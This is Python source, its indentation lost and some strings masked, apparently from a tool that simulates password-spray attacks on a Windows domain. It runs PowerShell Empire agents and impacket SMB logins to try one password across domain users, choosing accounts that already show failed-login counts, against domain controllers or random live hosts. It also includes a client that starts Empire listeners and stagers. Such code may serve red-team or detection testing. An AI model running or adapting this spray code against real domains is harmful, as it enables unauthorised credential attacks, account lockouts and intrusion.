def execute_module_with_results(self,module_name, agent_name, module_options=None):
#print ("Executing module " + module_name + " on " + agent_name)
r = self.execute_module(module_name, agent_name, module_options)
if r:
#print ("Result: " + str(r['success']))
print_info("Msg: " + r['msg'])
#print ("Msg: " + r['msg'])
if r['success'] is not False:
#print ("Waiting for results...")
print_info("Waiting for results...")
while True:
for result in self.get_agent_results(agent_name)['results']:
done = False
if len(result) > 0:
for entry in result['AgentResults']:
if entry['taskID'] == r['taskID']:
# Here we fix a bunch of stuff because Empire does not give standard output for all modules
# This is for get_domain_sid because Empire doesn't have a "completed" string when its done
if module_name == 'powershell/management/get_domain_sid':
if 'S-1-5-21' in entry['results']:
done = True
# Empire returns "Job started: xxxxxx" as results but we need just the completed results
if ' completed' in entry['results']:
done = True
if done == True:
# if debug: print_debug('Result Buffer: {}'.format(entry), agent_name)
return entry['results']
sleep(2)
def __init__(self,host,port,username,password):
print_info("Connecting to Empire REST API Server on "+host+":"+str(port)+"....")
self.host=host
self.port=port
self.base_url = 'https://'+host+':'+str(port)
self.token= {'token': self.login(host,username,password)}
if self.token['token'] is not None:
print_status("Successfully connected to Empire server "+host)
print_info("Starting Http Listener...")
self.listener = self.get_listener()
self.stager = self.generate_stager()
def impacket_spray_3(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword, UseDomainAct=True):
## Against several random hosts on the domain. Un authentication per host.
if UseDomainAct:
print_info("Querying for domain users with badPwdCount>=3...")
try:
users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
except:
print_error("Did not find enough users, try a lower Nusers value")
return
print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...")
else:
users = generate_random_users(nusers)
print_info("Using " + str(len(users)) + " randomly generated usernames (mimicking local accounts) ...")
print_info("Querying for domain computers that authenticated within the last day...")
try:
computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers)
except:
print_error("Did not find enough computers, try a lower Nusers value")
return
print_status("Obtained " + str(len(computers)) + " computers.")
print_info("Identifying live hosts ...")
computers = get_live_hosts(domain, computers, dc_ip)
print_status("Using " + str(len(computers)) + " randomly picked domain computers for the spray...")
if sleep > 0:
print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")
if nusers > len(computers):
users = users[:len(computers)]
for idx, user in enumerate(users):
smb_login(domain, user, spraypassword, computers[idx], sleep) if UseDomainAct else smb_login("", user, spraypassword, computers[idx], sleep)
def empire_spray_2(empiresession, agentid, duser, dpass, domain, dc_ip, nusers, spraypassword, sleep, UseDomainAct=True, UseKerberos=True):
## Against one random host on the domain
print_info("Querying for domain computers that authenticated within the last day...")
try:
computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers)
except:
print_error("Did not find enough computers, try a lower Nusers value")
return
print_status("Obtained " + str(len(computers)) + " computers.")
print_info("Identifying live hosts ...")
computers = get_live_hosts(domain,computers,dc_ip)
host = random.choice(computers)
print_status("Randomly picked domain computer : " + host[0] + " - " + host[1])
computername = host[0] if UseKerberos else host[1]
if UseDomainAct:
print_info("Querying for domain users with badPwdCount>=3...")
try:
users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
except:
print_error("Did not find enough users, try a lower Nusers value")
return
print_status("Using " + str(len(users)) + " randomly picked domain users for the spray.")
else:
users = generate_random_users(nusers)
print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...")
usernames = []
for user in users:
usernames.append(user if UseDomainAct else generate_random_users(10)[0])
usernames = ",".join(usernames)
if sleep > 0:
print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")
module_options = {'UserName': "******"" + usernames + "\"", 'ComputerName': computername, 'Password': spraypassword,
'Domain': domain, 'Sleep':str(sleep)} if UseDomainAct else {'UserName': "******"" + usernames + "\"", 'Domain':'',
'ComputerName': computername, 'Password': spraypassword,'Sleep':str(sleep)}
results=empiresession.execute_module_with_results("powershell/situational_awareness/network/smblogin", agentid, module_options)
print_status("Obtained results from the Powershell Empire agent")
process_empire_results(results,host)
def impacket_spray_1(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword, UseDomainAct=True, ):
## Against the DC
print_info("Querying for Domain Controllers...")
dcs =get_dcs(duser, dpass, domain, dc_ip)
dcs = get_live_hosts(domain,dcs,dc_ip)
dc = random.choice(dcs)
print_status("Randomly picked DC : "+dc[0]+" - "+dc[1])
if UseDomainAct:
print_info("Querying for domain users with badPwdCount>=3...")
try:
users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
except:
print_error("Did not find enough users, try a lower Nusers value")
return
print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...")
if sleep > 0:
print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")
smb_login(domain, users, spraypassword, dc, sleep)
else:
users = generate_random_users(nusers)
print_info("Using "+str(len(users))+" randomly generated usernames (mimic local account usage) ...")
if sleep > 0:
print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")
smb_login("", users, spraypassword, dc, sleep)
def empire_spray_3(empiresession, agentid, duser, dpass, domain, dc_ip, nusers, spraypassowrd, sleep, UseDomainAct=True, UseKerberos=True):
## Against several random hosts on the domain. One authentication per host.
if UseDomainAct:
print_info("Querying for domain users with badPwdCount>=3...")
#users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
try:
users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
except:
print_error("Did not find enough users, try a lower Nusers value")
return
print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...")
else:
users = generate_random_users(nusers)
print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...")
print_info("Querying for domain computers that authenticated within the last day...")
try:
computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers)
except:
print_error("Did not find enough computers, try a lower Nusers value")
return
print_status("Obtained " + str(len(computers)) + " computers.")
print_info("Identifying live hosts ...")
computers=get_live_hosts(domain,computers,dc_ip)
print_status("Using " + str(len(computers)) + " randomly picked domain computers for the spray...")
if sleep > 0:
print_status("Sleeping " + str((sleep)) + " seconds between each empire module execution...")
if nusers > len(computers):
users = users[:len(computers)]
for idx, user in enumerate(users):
duser = user if UseDomainAct else generate_random_users(1)[0]
computername = computers[idx][0] if UseKerberos else computers[idx][1]
module_options = {'UserName': duser, 'ComputerName': computername, 'Password': spraypassowrd,
'Domain': domain,'Sleep':'0'} if UseDomainAct else {'UserName': duser,'Domain':'',
'ComputerName': computername, 'Password': spraypassowrd,'Sleep':'0'}
results = empiresession.execute_module_with_results("powershell/situational_awareness/network/smblogin",
agentid, module_options)
print_status("Obtained results from the Powershell Empire agent")
process_empire_results(results,computers[idx])
# In thise scenario, adding the sleep here instead of Invoke-SMBLogin
if sleep > 0 :
time.sleep(sleep)
def impacket_spray_2(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword, UseDomainAct=True):
## Against one random host on the domain
print_info("Querying for domain computers that authenticated within the last day...")
try:
computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers)
except:
print_error("Did not find enough computers, try a lower Nusers value")
return
print_status("Obtained " + str(len(computers)) + " computers.")
print_info("Identifying live hosts ...")
computers=get_live_hosts(domain,computers,dc_ip)
host = random.choice(computers)
print_status("Randomly picked domain computer : " + host[0] + " - " + host[1])
if UseDomainAct:
print_info("Querying for domain users with badPwdCount>=3...")
try:
users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
except:
print_error("Did not find enough users, try a lower Nusers value")
return
print_status("Using " + str(len(users)) + " randomly picked domain users for the spray.")
if sleep > 0:
print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")
smb_login(domain, users, spraypassword, host, sleep)
else:
users = generate_random_users(nusers)
print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...")
if sleep > 0:
print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")
smb_login("", users, spraypassword, host, sleep)